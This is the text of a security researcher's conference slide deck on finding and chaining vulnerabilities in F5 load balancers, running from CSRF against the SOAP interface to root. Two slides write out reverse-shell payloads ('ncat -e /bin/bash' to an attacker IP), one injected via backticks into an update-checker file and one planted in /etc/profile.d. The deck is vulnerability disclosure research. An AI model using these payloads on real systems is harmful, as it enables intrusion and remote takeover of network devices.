Hacking Networking Gear F5
Ron Bowes - @iagox86
From CSRF to Root
December 2, 2022
https://infosec.exchange/@iagox86
1
Agenda
2
Introduction
3
Me
Clang
(like the compiler)
Sharp
(like C#)
Ron
(just Ron)
4
This talk
5
Why F5?
A few reasons I chose this target:
6
Initial Analysis
A few leads, a few dead-ends
7
Attack surface - netstat
It's a Linux system w/ standard CLI tools (like netstat, ncat, socat, strace, etc.)
We'll explore a bit, then come back to a few things
Some ideas (in no real order):
8
Attack surface - Apache modules
Custom Apache modules - network-facing low-level code!
CVE-2022-1388 was a remote root vulnerability in a module
Enumerate w/ "httpd -M"
9
Attack surface - Apache modules
There's certainly interesting code - like raw RSA, cookie processing, "database" (MCP) queries, etc
Ultimately, didn't find much interesting
10
Attack surface - Apache authentication
Authentication uses PAM - from httpd.conf (Apache's config file):
And PAM has a custom module:
11
Attack surface - PAM authentication module
But, it's largely a blocklist (or allowlist) with some other features:
12
Attack surface - What about CGI?
"apachectl status"
Four CGI scripts, had to reverse engineer to figure out arguments
13
Attack surface - CGI scripts - mpqd
"Seems like some sorta DB thing?" --my notes
14
Attack surface - CGI scripts - rrdstats
A thin wrapper around a shell utility - requires auth, but no CSRF protection - probably worth fuzzing
15
Attack surface - CGI scripts - rtstats
Another stats-type query - didn't seem to be anything interesting
16
Attack surface - CGI scripts - iControlPanel.cgi
It's a SOAP interface!
We'll come back to this later. :)
17
Attack surface - Startup Services
/var/service = startup stuff
Lots of interesting stuff here!
18
Attack surface - f5_update_checker?
19
Attack surface - f5_update_checker?
It runs, parses config file, does insecure curl, and.... nothing on the device uses it? A long forgotten script?
20
Attack surface - f5_update_checker
<-- I reverse the file format, it looks like this
Log output when you reboot:
21
Attack surface - f5_update_checker
Command injection!
Can create root backdoor...
...if you already have root :(
We'll come back to this :)
My notes -->
22
Attack surface - Summary
What we learned:
23
MCP
F5's database
24
What's MCP?
From what I can tell, a proprietary / not-publicly-documented datastore
Accessed via /var/run/mcp
AF_UNIX socket with 0777 permissions
25
Building queries
We know how to run queries, so...
26
"Reversing" MCP (aka, breaking stuff)
Can we steal the socket?
Yup! Note: this kills the devices (till you reboot)
27
"Reversing" MCP (aka, breaking stuff)
Can we MitM? Yup! "rm" the socket, then:
This doesn't (immediately) break
the device, but can't be good for�it :)
Request
28
"Reversing" MCP (aka, breaking stuff)
Can we replay? Yup!
Same Request we saw
29
MCP Protocol
I reversed the whole protocol, with:
30
MCP Protocol - Tool to build / parse queries
I built a tool: https://github.com/rbowes-r7/refreshing-mcp-tool
31
MCP Protocol - Tool to create accounts
mcp-privesc.rb creates a new root-level account
(root is not�required to�make these�queries!)
32
MCP Protocol - MitM
Not a vulnerability - requires a root login
But, a research tool!
(Sometimes breaks things)
33
SOAP
Getting dirty!
34
Exploring SOAP
WSDL files are available on the host
35
Exploring SOAP
Use advanced analysis techniques ("grep") to get all the names, then advanced data-mining ("grep") to find interesting ones
36
Exploring SOAP
This requires an account, but bear with me!
(I'll share a GitHub link with all this later)
"Password1"
37
Exploring SOAP
I learned how to make SOAP requests so you don't have to :)
"Hello world!"
38
Exploring SOAP
Problem: SELinux, of all things!
39
Exploiting SOAP
So wouldn't it be cool if...
40
Exploiting SOAP 1: Bypass authentication
Enter: Cross-site Request Forgery (CSRF)!
41
Exploiting SOAP 1: CSRF
It's a bit clunky, but we can run HTML code (left) in the user's browser, which sends a legal SOAP request (below)
42
Exploiting SOAP 2: Bypass SELinux
Remember this slide from earlier?
I wonder if we can write to�shared/f5_update_action?
Let's try it!
43
Exploiting SOAP 2: Bypass SELinux
Upload our own /shared/f5_update_action
AAA
https://localhost/success`ncat -e /bin/bash 10.0.0.179 4444
https://localhost/error
0
0
0
0
44
Exploiting SOAP 2: Bypass SELinux
Then wait for a reboot (technically there's a "reboot_system" SOAP endpoint, but rebooting a load balancer is probably a bad idea)
45
Exploiting SOAP 2: Bypass SELinux (method 2)
One file in /etc/profile.d is actually okay to replace
46
Exploiting SOAP 2: Bypass SELinux (method 2)
Just write commands to /etc/profile.d/timeout.sh, then wait for somebody to log in
ncat -e /bin/bash 10.0.0.179 4444 & disown;
47
Exploiting SOAP 3: Get ponies
Sorry, there are no ponies
48
Putting it all together
And into Metasploit!
49
Tools
Open source implementation of MCP:
Demo SOAP exploit / PoC:
50
Metasploit modules
I wrote Metasploit modules for:
Time to demo whatever we have time for!
(the next pile of slides are screenshots, since we're probably outta time)
51
Metasploit module - CSRF / SOAP (CVE-2022-41622)
52
Metasploit module - RPM SPEC injection (CVE-2022-41800)
53
Metasploit module - Privesc via /var/run/mcp
54
Metasploit module: post/module/gather/f5_enum_users
55
Metasploit module: post/module/gather/f5_enum_db_variables
56
Metasploit module: post/module/gather/f5_passwords
57
Q&A / Contact
58
Questions, if we have time!
Otherwise:
59